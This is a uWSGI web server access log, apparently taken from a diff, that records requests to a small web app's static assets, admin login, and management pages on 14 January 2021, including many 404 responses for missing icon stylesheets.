+[pid: 2069|app: -1|req: -1/4] 219.228.146.156 () {40 vars in 887 bytes} [Thu Jan 14 07:34:36 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/5] 219.228.146.156 () {40 vars in 869 bytes} [Thu Jan 14 07:34:36 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/6] 219.228.146.156 () {40 vars in 867 bytes} [Thu Jan 14 07:34:36 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/7] 219.228.146.156 () {40 vars in 873 bytes} [Thu Jan 14 07:34:36 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/8] 219.228.146.156 () {40 vars in 848 bytes} [Thu Jan 14 07:34:36 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/9] 219.228.146.156 () {40 vars in 846 bytes} [Thu Jan 14 07:34:36 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/10] 219.228.146.156 () {40 vars in 864 bytes} [Thu Jan 14 07:34:36 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/11] 219.228.146.156 () {40 vars in 862 bytes} [Thu Jan 14 07:34:36 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/12] 219.228.146.156 () {40 vars in 854 bytes} [Thu Jan 14 07:34:36 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/13] 219.228.146.156 () {40 vars in 908 bytes} [Thu Jan 14 07:34:38 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: 0|req: 3/14] 219.228.146.156 () {40 vars in 921 bytes} [Thu Jan 14 07:34:41 2021] GET /my-admin/ => generated 5366 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 4/15] 219.228.146.156 () {48 vars in 1018 bytes} [Thu Jan 14 07:34:51 2021] POST /my-admin/ => generated 27 bytes in 24 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 5/16] 219.228.146.156 () {40 vars in 928 bytes} [Thu Jan 14 07:34:52 2021] GET /admin-home/ => generated 6515 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: -1|req: -1/17] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 07:34:52 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 3 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/18] 219.228.146.156 () {38 vars in 807 bytes} [Thu Jan 14 07:34:52 2021] GET /static/css/style.css => generated 118751 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/19] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 07:34:52 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/20] 219.228.146.156 () {38 vars in 848 bytes} [Thu Jan 14 07:34:52 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/21] 219.228.146.156 () {38 vars in 836 bytes} [Thu Jan 14 07:34:52 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 3 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/22] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 07:34:52 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/23] 219.228.146.156 () {38 vars in 812 bytes} [Thu Jan 14 07:34:52 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/24] 219.228.146.156 () {38 vars in 788 bytes} [Thu Jan 14 07:34:53 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/25] 219.228.146.156 () {38 vars in 800 bytes} [Thu Jan 14 07:34:53 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/26] 219.228.146.156 () {38 vars in 876 bytes} [Thu Jan 14 07:34:54 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/27] 219.228.146.156 () {38 vars in 798 bytes} [Thu Jan 14 07:34:54 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/28] 219.228.146.156 () {38 vars in 872 bytes} [Thu Jan 14 07:34:54 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 6/29] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 07:34:54 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 7/30] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 07:34:54 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 8/31] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 07:34:54 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 9/32] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 07:34:54 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 10/33] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:34:54 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 11/34] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:34:54 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 12/35] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 07:34:54 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 13/36] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 07:34:54 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 14/37] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 07:34:55 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 15/38] 219.228.146.156 () {40 vars in 932 bytes} [Thu Jan 14 07:35:51 2021] GET /announcement => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 16/39] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 07:35:51 2021] GET /announcement/ => generated 7421 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 17/40] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 07:35:52 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 18/41] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 07:35:52 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 19/42] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 07:35:52 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 20/43] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 07:35:52 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 21/44] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:35:52 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 22/45] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 07:35:52 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 30 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 23/46] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:35:52 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 24/47] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 07:35:52 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 25/48] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 07:35:52 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 26/49] 219.228.146.156 () {40 vars in 936 bytes} [Thu Jan 14 07:35:54 2021] GET /announcement/ => generated 7421 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 27/50] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 07:35:54 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 28/51] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 07:35:54 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 29/52] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 07:35:54 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 30/53] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 07:35:54 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 19 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 32/54] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:35:54 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 32/55] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:35:54 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 20 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 33/56] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 07:35:54 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 34/57] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 07:35:54 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 35/58] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 07:35:54 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 36/59] 219.228.146.156 () {40 vars in 932 bytes} [Thu Jan 14 07:35:55 2021] GET /kind-manage => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 37/60] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 07:35:55 2021] GET /kind-manage/ => generated 6423 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 38/61] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 07:35:56 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 39/62] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 07:35:56 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 40/63] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 07:35:56 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 41/64] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 07:35:56 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 42/65] 219.228.146.156 () {38 vars in 872 bytes} [Thu Jan 14 07:35:56 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 43/66] 219.228.146.156 () {38 vars in 872 bytes} [Thu Jan 14 07:35:56 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 22 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 44/67] 219.228.146.156 () {38 vars in 818 bytes} [Thu Jan 14 07:35:56 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 45/68] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 07:35:56 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 46/69] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 07:35:56 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 47/70] 219.228.146.156 () {40 vars in 932 bytes} [Thu Jan 14 07:35:58 2021] GET /kind-manage/ => generated 6423 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 48/71] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 07:35:59 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 49/72] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 07:35:59 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 50/73] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 07:35:59 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 51/74] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 07:35:59 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 52/75] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 07:35:59 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 53/76] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 07:35:59 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 38 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 54/77] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 07:35:59 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 55/78] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 07:35:59 2021] GET /static/css/spinners.css => generated 3516 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 56/79] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 07:35:59 2021] GET /static/css/animate.css => generated 3513 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 2069|app: 0|req: 57/80] 219.228.146.146 () {38 vars in 824 bytes} [Thu Jan 14 07:36:13 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 2069|app: 0|req: 58/81] 219.228.146.146 () {38 vars in 770 bytes} [Thu Jan 14 07:36:13 2021] GET /favicon.ico => generated 3480 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 59/82] 219.228.146.146 () {38 vars in 836 bytes} [Thu Jan 14 07:36:21 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: / +[pid: 2069|app: 0|req: 60/83] 219.228.146.253 () {36 vars in 719 bytes} [Thu Jan 14 07:39:00 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 2069|app: 0|req: 61/84] 219.228.146.253 () {36 vars in 665 bytes} [Thu Jan 14 07:39:00 2021] GET /favicon.ico => generated 3480 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 62/85] 219.228.146.253 () {36 vars in 730 bytes} [Thu Jan 14 07:39:10 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 63/86] 219.228.146.253 () {36 vars in 732 bytes} [Thu Jan 14 07:39:10 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/87] 219.228.146.253 () {38 vars in 766 bytes} [Thu Jan 14 07:39:10 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/88] 219.228.146.253 () {38 vars in 788 bytes} [Thu Jan 14 07:39:10 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/89] 219.228.146.253 () {38 vars in 774 bytes} [Thu Jan 14 07:39:10 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/90] 219.228.146.253 () {38 vars in 749 bytes} [Thu Jan 14 07:39:10 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/91] 219.228.146.253 () {38 vars in 768 bytes} [Thu Jan 14 07:39:10 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/92] 219.228.146.253 () {38 vars in 770 bytes} [Thu Jan 14 07:39:10 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/93] 219.228.146.253 () {38 vars in 747 bytes} [Thu Jan 14 07:39:10 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/94] 219.228.146.253 () {38 vars in 765 bytes} [Thu Jan 14 07:39:10 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/95] 219.228.146.253 () {38 vars in 763 bytes} [Thu Jan 14 07:39:10 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/96] 219.228.146.253 () {38 vars in 755 bytes} [Thu Jan 14 07:39:10 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/97] 219.228.146.253 () {38 vars in 809 bytes} [Thu Jan 14 07:39:13 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/98] 219.228.146.253 () {38 vars in 783 bytes} [Thu Jan 14 07:39:13 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: 0|req: 64/99] 219.228.146.146 () {40 vars in 890 bytes} [Thu Jan 14 07:43:09 2021] GET /my-admin => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 65/100] 219.228.146.146 () {40 vars in 892 bytes} [Thu Jan 14 07:43:09 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/101] 219.228.146.146 () {40 vars in 828 bytes} [Thu Jan 14 07:43:09 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/102] 219.228.146.146 () {40 vars in 850 bytes} [Thu Jan 14 07:43:09 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/103] 219.228.146.146 () {40 vars in 832 bytes} [Thu Jan 14 07:43:09 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/104] 219.228.146.146 () {40 vars in 830 bytes} [Thu Jan 14 07:43:09 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/105] 219.228.146.146 () {40 vars in 836 bytes} [Thu Jan 14 07:43:09 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: 0|req: 66/106] 219.228.146.146 () {48 vars in 978 bytes} [Thu Jan 14 07:43:19 